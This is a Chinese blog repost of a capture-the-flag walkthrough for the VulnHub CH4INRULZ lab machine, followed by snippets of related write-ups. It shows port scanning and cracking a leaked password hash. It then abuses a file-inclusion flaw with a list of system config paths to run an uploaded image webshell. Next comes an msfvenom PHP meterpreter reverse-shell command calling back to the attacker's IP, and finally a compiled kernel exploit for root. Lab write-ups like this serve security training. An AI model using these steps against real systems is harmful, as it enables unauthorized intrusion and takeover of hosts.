CH4INRULZ从渗透到提权

最新推荐文章于 2024-04-26 23:33:44 发布
最新推荐文章于 2024-04-26 23:33:44 发布
阅读量141 收藏
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/test404/p/10638103.html
版权

下载了镜像后查看了ip

http://192.168.16.128/

然后用nmap扫描了一波

sudo nmap -vv -sV  192.168.16.128

访问80端口发现是个个人博客

访问8081端口发现也是个站点

先搞web 然后开始用工具扫描目录

80端口扫描发现

8011端口发现api目录

访问80端口的development目录发现需要登陆

同时扫描器还扫描到了

http://192.168.16.128:80/index.html.bak

发现了frank的hash 然后利用john工具进行了破解

john hash.txt

发现密码是

frank!!!

登陆development发现

http://192.168.16.128/development/

继续访问

http://192.168.16.128/development/uploader

经过一番fuzz

t.php.aaa    5.php   5.php[1234567] 5.php%89 都不可以

都无法传成功

于是转战8011端口

http://192.168.16.128:8011/api/

挨个访问发现只有

http://192.168.16.128:8011/api/files_api.php

能访问

看他页面提示发现是缺少个参数

于是尝试给他传个参数

文件包含 or 任意文件读取

接下来的思路就是读配置文件,读日志,找网站根目录进而找到刚才传的图片马来配合

于是进行了一波fuzz

file = /etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/var/lib/mlocate/mlocate.db
/etc/apache2/envvars
/etc/httpd/conf/httpd.conf
/etc/my.cnf
.bash_history
/usr/local/nginx/conf/nginx.conf
/etc/httpd/conf/httpd.conf 
/etc/apache2/apache2.conf
/proc/self/environ

file=//etc/apache2/sites-available/default

读到了配置信息

翻看有用的信息

另外一个web在

根据路径推断出了在80端口上传的图片

file=/var/www/development/uploader/FRANKuploads/1.jpg

出现了熟悉的画面

?剑连接

在tmp目录下上传Linux_Exploit_Suggester.pl

根据探测信息搜索exp

caidao中 执行并不会返回root的命令行

然后尝试nc反弹发现 -e参数 不能用 /bin/bash也弹不回来

然后

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.109  LPORT=13333 -f raw -o x.php

在tmp目录上传,然后在msf上监听

随后在tmp目录下执行

php -f "x.php"

成功反弹shell

然后执行

gcc exp.c -o exp
./exp

Cool

转载于:https://www.cnblogs.com/test404/p/10638103.html

weixin_30338481
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CH4INRULZ靶机渗透测试
weixin_49340699的博客
06-23 347
CH4INRULZ靶机渗透测试环境工具流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searchsploit,dirb,御剑,在线解码工具,wget 流程 首先对目标网段进行主机发现扫描然后扫端口 发现有80端口上去也没有发现什么收获 回来目录爆破发现几个目录啥也没有就http://192.168.1.103/development这个目录弹了个登录框可咱也没有账号密码啊 换御剑继续扫 看见一个bak访
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
Vulnhub:CH4INRULZ渗透测试
mandarava的博客
09-15 803
文章目录0x01 环境搭建0x02 环境来源0x03 渗透过程80端口信息收集8011信息收集脏牛提权 0x01 环境搭建 靶机IP 攻击IP 备注 172.17.135.35 172.17.135.51 本机 192.168.179.129 kali 172.17.135.48 同网段服务器 0x02 环境来源 vulnhub官网:https://download...
CH4INRULZ-v1靶机练习实践报告
最新发布
黑战士的博客
04-26 740
熟练使用工具metasploit(scanner/http/dir_scanner)、searchsploit、nitko、john看到网站的全貌和功能后要想到可能存在的漏洞,可以利用的方法。熟悉任意文件读漏洞、文件上传漏洞、各种图片文件格式等。
VulnHub——CH4INRULZ
江左盟的博客
04-13 1111
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
vulnhub Ch4inrulz 1.0.1
分享
10-01 104
vulnhub靶机Ch4inrulz 1.0.11复现
CH4INRULZ靶机渗透
weixin_64809022的博客
06-28 212
脏牛提权
ch4.zip_java ch4
09-19
9. **编码与解码**:字符串与字节流之间的转换涉及到编码问题,`getBytes()`方法用于获取字符串的字节数组(默认使用平台的默认字符集),`new String(byte[], charset)`则根据指定字符集构造字符串。 10. **字符串...
Ch4.rar_CH4
07-14
数字图像处理,利用matlab开发环境进行编程实践。
CH4.rar_CH4_C语言
09-23
本资料"CH4.rar"聚焦于C语言中的常用算法,旨在帮助开发者深入理解和掌握这些核心算法,从而提升编程能力。 一、数组与指针 C语言中的数组和指针是实现算法的基础。数组是一种存储相同类型元素的集合,可以通过...
CH4_ch4chemkin_chemkin_CH4_
10-03
标题 "CH4_ch4chemkin_chemkin_CH4_" 暗示了我们正在讨论与甲烷(CH₄)相关的Chemkin模型。Chemkin是一个广泛使用的化学动力学软件包,用于模拟燃烧、火焰和化学反应过程。描述中的"chemkin使用"进一步确认我们将...
[Vulnhub] CH4INRULZ_v1.0.1
weixin_63231007的博客
07-05 820
目录信息搜集图片🐎拿shell提权下载链接:ch4inrulz: 1.0.1 ~ VulnHubnmap -sP kali-ip得到靶机ip:192.168.236.136nmap -A 192.168.236.136 看看靶机开放了哪些服务 开放21 ftp 22 ssh 80和8011 http服务访问一下试试 发现是一个类似于博客的页面 dirb 扫描一下后台看看有没有登录地址或者隐藏页面 development处需要登录,其他没有有用信息dirb http://192.168.236.136 -.
VulnHub靶场之CH4INRULZ_v1.0.1
qq_42307546的博客
04-26 1655
下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.168.1.0/24 端口信息探测 nmap -p 1-65535 -vv -sC 192.168.1.21 80和8011,22,21开放,先访问80端口 扫描web目录 gobuster dir -u http://192.168.1.21/ -w /usr/share/wordlists/dirb
靶机CH4INRULZ_v1.0.1
weixin_43940853的博客
12-12 508
kali : 192.168.230.236 靶机 : 192.168.230.238 与之前的靶机不同,这次有ftp和8011,先登陆ftp看看 发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说) 接着看看80没有什么发现 找不到可入手的地方(80网页先暂时放一放) 一开始有一个8011端口,我们访问一下 访问之...
Vulnhub靶场渗透-CH4INRULZ_v1.0.1
paidx0
09-24 635
前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用 扫描 80 端口 扫描 8011 端口 看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件 对这个解密,拿到一对账号密码 ...
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 456
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
靶机渗透CH4INRULZ_v1.0.1(三)
Delity的博客
07-27 394
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.143.129 nmap -sP 192.168.19.0/24 2.扫描靶机开放了哪些端口 nmap -sV 192.168.143.129 可以发现靶机开放了21 22 80 8011端口,可以从ssh服务、web服务进行入手 三、渗透过程 1.通过端口扫描发现21为FTP服务,版本为vsftpd 2.3.5;22为SSH服务,版本为OpenSSH 5
VulnHub系列之ch4inrulz 渗透测试
Flynn的博客
04-26 557
CH4INRULZ_v1.0.1 靶机地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 弗兰克有一个小网站,他是一个聪明的开发人员,具有正常的安全背景,他总是喜欢遵循模式,你的目标是发现任何严重的漏洞并获得对系统的访问权限,然后你需要获得 root 访问权限才能捕获。根标志。 这台机器是为 Jordan's Top hacker 2018 CTF 制作的
05ch4S71200PLC的用户程序结构与故障诊断.pptx
11-12
在《05ch4S71200PLC的用户程序结构与故障诊断》中,介绍了S71200PLC的用户程序结构和故障诊断方面的知识。本文提到了模块化编程的概念,将复杂的自动化任务划分为较小的子任务,每个子任务对应一个称为“块”的子...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值